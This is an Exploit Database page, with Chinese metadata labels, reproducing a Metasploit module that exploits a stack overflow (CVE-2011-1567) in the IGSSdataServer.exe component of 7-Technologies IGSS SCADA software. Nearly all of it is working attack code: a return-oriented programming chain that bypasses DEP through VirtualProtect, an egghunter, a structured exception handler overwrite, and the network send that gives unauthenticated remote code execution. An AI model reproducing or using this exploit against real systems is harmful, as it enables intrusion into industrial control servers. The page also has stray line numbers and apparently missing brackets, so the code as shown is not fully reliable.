7-Technologies IGSS 9.00.00 b11063 – ‘IGSSdataServer.exe’ Remote Stack Overflow (Metasploit)

Exploit Database
109 阅读

作者： Metasploit

日期： 2011-05-16
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/17300/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::Remote::Egghunter

include Msf::Exploit::Remote::Tcp

def initialize(info={})

super(update_info(info,

'Name' => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",

'Description'=> %q{

This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies

IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application

fails to do proper bounds checking before copying data into a small buffer on the stack.

This causes a buffer overflow and allows to overwrite a structured exception handling record

on the stack, allowing for unauthenticated remote code execution.

'License'=> MSF_LICENSE,

'Version'=> '$Revision: 12639 $',

'Author' =>

[

'Luigi Auriemma', #Initial discovery, poc

'Lincoln',#Metasploit

'corelanc0d3r', #Rop exploit, combined XP SP3 & 2003 Server

'sinn3r', #Serious Msf style policing

'References' =>

[

['CVE', '2011-1567'],

['OSVDB', ''],

['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],

'Payload'=>

{

'BadChars' => "\x00",

'DefaultOptions'=>

{

'ExitFunction' => 'process',

'Platform' => 'win',

'Targets'=>

[

'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',

{

'Ret'=> 0x1b77ca8c,#dao360.dll pivot 1388 bytes

'Offset' => 500

}

'Privileged' => false,

'DisclosureDate' => "March 24 2011",

'DefaultTarget'=> 0))

register_options(

[

Opt::RPORT(12401)

], self.class)

end

def junk

return rand_text(4).unpack("L")[0].to_i

end

def exploit

eggoptions =

{

:checksum => false,

:eggtag => 'w00t',

:depmethod => 'virtualprotect',

:depreg => 'esi'

}

badchars = "\x00"

hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

#dao360.dll - pvefindaddr rop 'n roll

rop_chain = [

0x1b7681c4,# rop nop

0x1b72f174,# POP EAX # RETN 08

0xA1A10101,

0x1b7762a8,# ADD EAX,5E5F0000 # RETN 08

junk,

0x1b73a55c,# XCHG EAX,EBX # RETN

junk,

0x1b724004,# pop ebp

0x1b72f15f,# &push esp # retn 8

0x1b72f040,# POP ECX # RETN

0x1B78F010,# writeable

0x1b7681c2,# xor eax,eax # retn

0x1b72495c,# add al,40 # mov [esi+4],eax # pop esi # retn 4

0x41414141,

0x1b76a883,# XCHG EAX,ESI # RETN 00

junk,

0x1b7785c1,# XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C

junk,

0x1b78535c,# ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10

junk,

0x1b7280b4,# POP EDI # XOR EAX,EAX # POP ESI # RETN

junk,

0x1b7681c4,# rop nop (edi)

0x90909090,# esi -> eax -> nop

0x1b72f174,# POP EAX # RETN 08

0xA1F50214,# offset to &VirtualProtect

0x1b7762a8,# ADD EAX,5E5F0000 # RETN 08

junk,

0x1b73f3bd,# MOV EAX,DWORD PTR DS:[EAX] # RETN

junk,

0x1b76a883,# XCHG EAX,ESI # RETN 00

0x1b72f040,# pop ecx

0x1B78F010,# writeable (ecx)

0x1b764716,# PUSHAD # RETN

].pack('V*')

header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"

header << rand_text(14)

sploit = rop_chain

sploit << "\x90" * 10

sploit << hunter

sploit << rand_text(target['Offset'] - (sploit.length))

sploit << [target.ret].pack('V')

sploit << egg

sploit << rand_text(2000)

connect

print_status("Sending request...")

sock.put(header + sploit)

handler

disconnect

end